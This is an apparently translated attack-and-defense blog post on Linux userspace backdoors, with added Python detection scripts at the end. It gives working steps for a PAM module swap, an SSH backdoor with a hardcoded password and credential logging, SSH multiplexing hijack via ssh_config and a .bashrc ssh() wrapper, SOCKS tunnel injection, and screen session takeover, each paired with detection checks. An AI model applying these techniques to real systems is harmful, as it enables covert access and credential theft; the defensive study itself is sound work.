Linux UserSpace BackDoor Rootkit Attack And Defensive Technology

Published: 2019-Mar-21
Catalog
0. Introduction
1. PAM backdoor
2. SSH backdoor
3. Hijacking SSH
4. Hijacking SSH By Setting Up A Tunnel Which Allows Multiple Sessions Over The Same SSH Connection Without Re-Authentication
5. Hijacking Active SSH Screen Sessions

0. Introduction

0x1: A view on attack and defense

1. Know Your Enemy : Know Your System
// The client-side battlefield is mainly the operating system itself, but it also includes the modules that connect to the system, such as web and remote login. Only by understanding their characteristics (especially the high-performance and edge-case features) can targeted defenses be built.
2. Effectiveness != Complexity
// Attack and defense is a holistic engineering effort: a vulnerability in any single dimension can lead to an intrusion, so kernel-level security is not necessarily more important than application-level security; they matter equally. The effectiveness of an attack or defense technique does not need to be guaranteed by complexity.
3. Everything Is A Weapon
// Wherever skill reaches, everything becomes a blade: for any operating system feature, once the right way of using and combining it is found, it can very likely form an intrusion vector.

0x2: Attacker vs Defender

1. For the Attacker:
Use System Builtins to Simulate Rootkit Functionality. Be as quiet as possible: disguise the rootkit as normal system tools and behaviour.
Stop relying on tools: 'Master the environment.'
2. For the Defender:
Know Your System, Before I Use it Against You.
Thinking like an attacker: 'Flip the evil bit.'

Relevant Link:
https://www.blacklodgeresearch.org/files/7613/6963/4840/Poor_Mans_Root_Kit_BLR_talk_PUBLIC_2013.pdf

1. PAM backdoor

PAM (Pluggable Authentication Module), put simply, provides a unified abstract interface for identity and password verification. Application programmers can use these APIs to implement security-related functionality, and PAM can act as the unified verification entry point for Linux logins (including SSH). For exactly the same reason, an attacker can use PAM to deploy a code-level logic backdoor for SSH.

0x1: Query the PAM version installed on this machine

0x2: Download the corresponding source files
http://pkgs.fedoraproject.org/repo/pkgs/pam/Linux-PAM-0.99.6.2.tar.bz2/52844c64efa6f8b6a9ed702eec341a4c/
http://www.linux-pam.org/pre/history/
http://www.linux-pam.org/pre/library/

0x3: Back up the original PAM .so file
cd /lib64/security
ll pam_unix.so
mv pam_unix.so pam_unix.so.bak

0x4: Modify the source file and add the logic backdoor
cd /zhenghan/pam-backdoor/Linux-PAM-0.99.6.2/modules/pam_unix
vim pam_unix_auth.c

0x5: Recompile the PAM module
cd /zhenghan/pam-backdoor/Linux-PAM-0.99.6.2/
./configure
make

0x6: Replace the system's default PAM module with the module containing the logic backdoor
cp /zhenghan/pam-backdoor/Linux-PAM-0.99.6.2/modules/pam_unix/.libs/pam_unix.so /lib64/security/pam_unix.so

0x7: Test the backdoor
1. Log in with the normal root account and password
2. Log in covertly with the root account and the backdoor password (pam)

0x8: Detection countermeasures

pam_unix is a native system module, so RPM's verification mechanism can be used to detect tampering.

1. Use rpm to verify whether an installed package has been modified
rpm -qV pam
....L.... c /etc/pam.d/fingerprint-auth
....L.... c /etc/pam.d/password-auth
....L.... c /etc/pam.d/smartcard-auth
....L.... c /etc/pam.d/system-auth
S.?...... /lib64/libpam.so.0.82.2
S.?...... /lib64/libpam_misc.so.0.82.0
S.5....T. /lib64/security/pam_unix.so

Meaning of the result
/*
If everything verifies correctly, nothing is printed. Any discrepancy is displayed.
Output format
1. 8-character string: each of the 8 characters represents the result of comparing one attribute of the file against the RPM database ('.' means the check passed)
 1) S: file size
 2) M: mode (includes permissions and file type)
 3) 5: checksum (md5); ?: file not readable
 4) D: device
 5) L: symbolic link
 6) U: user
 7) G: group
 8) T: file modification time
2. c: marks a configuration file
3. file name
*/

From the binary point of view, an .so file into which a code-level logic backdoor has been planted can be treated like a virus: by extracting the binary signature around the logic backdoor and adding it to the antivirus signature database, such backdoors can be detected and removed, and the module can be prevented from being loaded by ssh.
1. Extract the signature of the pam_unix.so that contains the logic backdoor
2. Add it to the antivirus signature database
3. Prevent the backdoored pam_unix.so module from being loaded by the ssh process

Relevant Link:
http://www.csdn123.com/html/itweb/20130911/112822_112821_112829.htm
http://www.cnblogs.com/LittleHann/p/3662161.html
http://bobao.360.cn/learning/detail/454.html
http://www.awaysoft.com/taor/rpm%E6%A0%A1%E9%AA%8C%E5%B7%B2%E5%AE%89%E8%A3%85%E5%8C%85%E6%98%AF%E5%90%A6%E8%A2%AB%E4%BF%AE%E6%94%B9.html

2. SSH backdoor

vi includes.h // change the backdoor password and the locations of the log files
/*
+#define ILOG "/tmp/ilog"           // records the usernames and passwords of users logging in to this host
+#define OLOG "/tmp/olog"           // records the usernames and passwords this host uses to log in to remote hosts
+#define SECRETPW "123456654321"    // the backdoor password
*/

0x1: Backdoor behaviour
1. Using the configured backdoor password, the attacker can log in while skipping the authentication logic entirely
2. Every login by the administrator, whether with root or another account, is secretly recorded, which amounts to a key logger

0x2: Detection countermeasures
1. Use rpm to verify whether the installed package has been modified
2. Extract the binary signature of the malicious ssh binary containing the logic backdoor

Relevant Link:
http://www.freebuf.com/tools/10474.html

3. Hijacking SSH

SSH can also be used to gather intelligence about other potential targets on the network. Every time a user connects to a system using SSH, a file called known_hosts is created in $HOME/.ssh/; by examining this file an attacker can see other hosts that trust the user.
After an attacker has taken control of a user's machine, reading known_hosts may reveal the next jump host, intranet hosts or DMZ machines that the current host connects to, widening the attack surface.

Relevant Link:
https://www.defcon.org/images/defcon-15/dc15-presentations/Moore_and_Valsmith/Whitepaper/dc-15-moore_and_valsmith-WP.pdf

4. Hijacking SSH By Setting Up A Tunnel Which Allows Multiple Sessions Over The Same SSH Connection Without Re-Authentication

0x1: SSH multiplexing

Multiplexing is the ability to send more than one signal over a single line or connection. With multiplexing, OpenSSH can re-use an existing TCP connection for multiple concurrent SSH sessions rather than creating a new one each time.
1. The overhead of creating new TCP connections is eliminated. The overall number of connections that a machine may accept is a finite resource; the limit is more noticeable on some machines than on others, and varies greatly depending on both load and usage.
2. With multiplexing only a single TCP connection is set up and used, regardless of whether or not there are multiple SSH sessions carried over it.
3. Multiplexed connections significantly reduce the time needed to establish an ssh connection.

0x2: Setting Up Multiplexing

It must be understood that SSH hijacking takes place on the machine the attacker already controls: through SSH hijacking the attacker hopes to reach, without a password, the next machine that the current user connects to. The configuration files the attacker modifies are therefore those on the compromised user's machine.
1. ControlMaster: determines whether ssh will listen for control connections and what to do about them.
2. ControlPath: the location of the control socket used by the multiplexed sessions.
3. ControlPersist: can be used in conjunction with ControlMaster.
 1) If set to 'yes', it will leave the master connection open in the background indefinitely to accept new connections until either killed explicitly or closed with -O.
// Control sockets are removed automatically when the master connection is ended.

1. The attacker has root privileges
vim /etc/ssh/ssh_config
/*
..
ControlPath /tmp/%r@%h:%p
ControlMaster auto
ControlPersist yes
..
*/
Once ControlMaster mode is enabled, if the current user has already logged in successfully once to the target machine (for example a remote jump host or a DMZ machine), the attacker can use multiplexing to log in to that same server directly 'without a password'. Put simply, SSH password authentication is tied to the TCP connection, not to the session; when multiplexing takes place, the attacker's session bypasses all login verification.

2. The attacker does not have root privileges
vim $HOME/.ssh/config
/*
..
ControlPath /tmp/%r@%h:%p
ControlMaster auto
ControlPersist yes
..
*/

3. Wrap the ssh command in .bashrc
vim $HOME/.bashrc
/*
..
ssh () { /usr/bin/ssh -o 'ControlMaster=auto' -o 'ControlPath=/tmp/%r@%h:%p' -o 'ControlPersist=yes' "$@"; }
..
*/
This uses Bash's user-defined function feature together with SSH's ability to take configuration options on the command line to enable ControlMaster mode.

0x3: The attacker reuses the socket of a multiplexed session to make SSH connections

These settings will cause all new SSH sessions to create a persistent brokering master socket.
I've used %h in control socket commands to represent the target host; %h can be any char(s).
This socket can be used to create further sessions, without credentials, even after the original user exits their session.

0x4: Adding a dynamic tunnel

We can create a dynamic tunnel inside an existing master socket
lsof -i TCP:9090
ssh -O forward -D 9090 -S /tmp/[email protected]:22 %h
lsof -i TCP:9090
This command injects a port forward; once it has run, port 9090 on this machine can be used as a SOCKS5 proxy to reach the next hop's network segment.

0x5: As noted above, when ControlPersist is yes the socket file is not removed automatically. It can be deleted manually with rm /tmp/[email protected]:22, or more gracefully with
ssh -O exit -S /tmp/[email protected]:22 %h

0x6: Detection countermeasures
1. Check whether ControlMaster mode has been enabled in the ssh configuration files
 1) /etc/ssh/ssh_config
 2) $HOME/.ssh/config
2. Check whether an ssh() hijack is present among the bash user-defined functions (bash prints function definitions as 'ssh () ', with a space before the parentheses)
set | grep 'ssh ()'

Relevant Link:
https://en.wikibooks.org/wiki/OpenSSH/Cookbook/Multiplexing
http://unix.stackexchange.com/questions/22965/limits-of-ssh-multiplexing
http://www.anchor.com.au/blog/2010/02/ssh-controlmaster-the-good-the-bad-the-ugly/
http://www.revsys.com/writings/quicktips/ssh-faster-connections.html

5. Hijacking Active SSH Screen Sessions

The scenario: the user ssh_user manages ssh sessions with screen.
1. When ssh_user runs screen ssh [email protected] to connect to the remote host '112.124.20.20', a corresponding file appears in /var/run/screen
2. ls -la /var/run/screen/
The session can be taken over with screen -r root/
Injecting into a screen-managed ssh session has one drawback: the commands you type are displayed at the same time to the user who is currently connected, so it is easy to get noticed.

0x1: Detection countermeasures
1. Check whether /var/run/screen/ contains screen sessions; to some degree this counts as a suspicious event.

Relevant Link:
http://0xthem.blogspot.com/2015/03/hijacking-ssh-to-inject-port-forwards.html
http://drops.wooyun.org/tips/5253

Copyright (c) 2015 Little5ann All rights reserved
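As an added example (not code from the original post), the following Python parses rpm -V output in the format explained in section 1 (0x8) and flags non-config files whose size or digest changed, which is exactly what a replaced pam_unix.so looks like. The sample output is the page's rpm -qV pam listing, re-typed here as a constructed fixture.

```python
"""Parse 'rpm -V' output and flag modified package binaries (added example)."""
import subprocess

# One letter per attribute position, as documented in section 1 (0x8) above.
FLAGS = {"S": "size", "M": "mode", "5": "md5 digest", "D": "device", "L": "symlink",
         "U": "user", "G": "group", "T": "mtime", "P": "capabilities", "?": "unreadable"}

# Constructed fixture: the rpm -qV pam listing shown on the page.
SAMPLE_RPM_V = """\
....L.... c /etc/pam.d/fingerprint-auth
....L.... c /etc/pam.d/password-auth
....L.... c /etc/pam.d/smartcard-auth
....L.... c /etc/pam.d/system-auth
S.?...... /lib64/libpam.so.0.82.2
S.?...... /lib64/libpam_misc.so.0.82.0
S.5....T. /lib64/security/pam_unix.so
"""

def parse_rpm_verify(output):
    """Return one dict per reported file: path, file-type marker ('c' = config,
    '' = none) and the set of attributes that differ from the RPM database.
    Files that verify cleanly never appear, because rpm prints nothing for them."""
    results = []
    for line in output.splitlines():
        parts = line.split(None, 2)               # status, optional marker, path
        if len(parts) < 2 or not set(parts[0]) <= set(FLAGS) | {"."}:
            continue                              # e.g. 'missing' lines or noise
        if len(parts) == 3 and len(parts[1]) == 1:
            marker, path = parts[1], parts[2]
        else:                                     # no marker: rest of line is the path
            marker, path = "", line.split(None, 1)[1]
        changed = {FLAGS[ch] for ch in parts[0] if ch != "."}
        results.append({"path": path, "type": marker, "changed": changed})
    return results

def suspicious_binaries(results):
    """Non-config files whose contents differ (size or digest). Symlink-only
    differences on config files (the ....L.... lines above) are common and ignored."""
    return [r["path"] for r in results
            if r["type"] != "c" and r["changed"] & {"size", "md5 digest"}]

if __name__ == "__main__":
    # rpm -V exits non-zero when anything differs, so do not use check=True.
    out = subprocess.run(["rpm", "-V", "pam"], capture_output=True, text=True).stdout
    for path in suspicious_binaries(parse_rpm_verify(out)):
        print("modified binary:", path)
```

Run it on the fixture (parse_rpm_verify(SAMPLE_RPM_V)) to see the three library files flagged; on a live host compare any flagged path against the vendor package before trusting it.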
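The detection checks listed in sections 4 (0x6) and 5 (0x1), as one added Python audit script that is not part of the original post: it parses ssh_config files for the ControlMaster/ControlPath/ControlPersist settings, detects an ssh() shell function that shadows /usr/bin/ssh, and lists leftover control sockets and screen session files. The sample config and .bashrc text below are constructed to mirror the page's snippets; the /tmp socket glob assumes the page's ControlPath pattern.

```python
"""Audit a host for the SSH multiplexing and screen hijack indicators (added example)."""
import re
from pathlib import Path

# Values that make ssh keep a reusable master socket around (section 4, 0x2).
SUSPICIOUS = {"controlmaster": {"auto", "yes"}, "controlpersist": {"yes"}}
SSH_FUNC = re.compile(r"^\s*(?:function\s+)?ssh\s*\(\)", re.M)   # 'ssh () {' or 'function ssh ()'

SAMPLE_CONFIG = """# constructed: mirrors the ssh_config snippet in section 4
Host *
    ControlPath /tmp/%r@%h:%p
    ControlMaster auto
    ControlPersist yes
"""
SAMPLE_BASHRC = """# constructed: mirrors the .bashrc wrapper in section 4
ssh () { /usr/bin/ssh -o 'ControlMaster=auto' -o 'ControlPath=/tmp/%r@%h:%p' -o 'ControlPersist=yes' "$@"; }
"""

def audit_ssh_config(text):
    """Return (host_block, option, value) for every ControlMaster/ControlPersist
    setting that enables a persistent master, plus any ControlPath, so the socket
    location is known. Keys are case-insensitive and may be 'Key value' or 'Key=value'."""
    findings, host = [], "*"                       # options before any Host line apply to all
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()        # drop comments and blank lines
        parts = re.split(r"[\s=]+", line, maxsplit=1)
        if len(parts) != 2:
            continue
        key, value = parts[0].lower(), parts[1].strip()
        if key == "host":
            host = value
        elif key in SUSPICIOUS and value.lower() in SUSPICIOUS[key]:
            findings.append((host, key, value.lower()))
        elif key == "controlpath":
            findings.append((host, key, value))
    return findings

def shell_wraps_ssh(text):
    """True if an rc file defines a function named ssh that injects ControlMaster options."""
    return bool(SSH_FUNC.search(text)) and "controlmaster" in text.lower()

def audit_host(home=Path.home()):
    """Collect all indicators from the live system into one report dict."""
    report = {}
    for cfg in (Path("/etc/ssh/ssh_config"), home / ".ssh" / "config"):
        if cfg.is_file() and (hits := audit_ssh_config(cfg.read_text(errors="replace"))):
            report[str(cfg)] = hits
    for rc in (home / ".bashrc", home / ".bash_profile", home / ".profile"):
        if rc.is_file() and shell_wraps_ssh(rc.read_text(errors="replace")):
            report[str(rc)] = "defines ssh() with ControlMaster options"
    report["control_sockets"] = [str(p) for p in Path("/tmp").glob("*@*:*") if p.is_socket()]
    screen = Path("/var/run/screen")               # section 5: S-<user>/<pid>.<name> entries
    report["screen_sessions"] = [str(p) for p in screen.glob("S-*/*")] if screen.is_dir() else []
    return report
```

audit_host() only reads files and directory listings, so it can run as an unprivileged user; entries under /var/run/screen for users other than the caller may be invisible without root.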

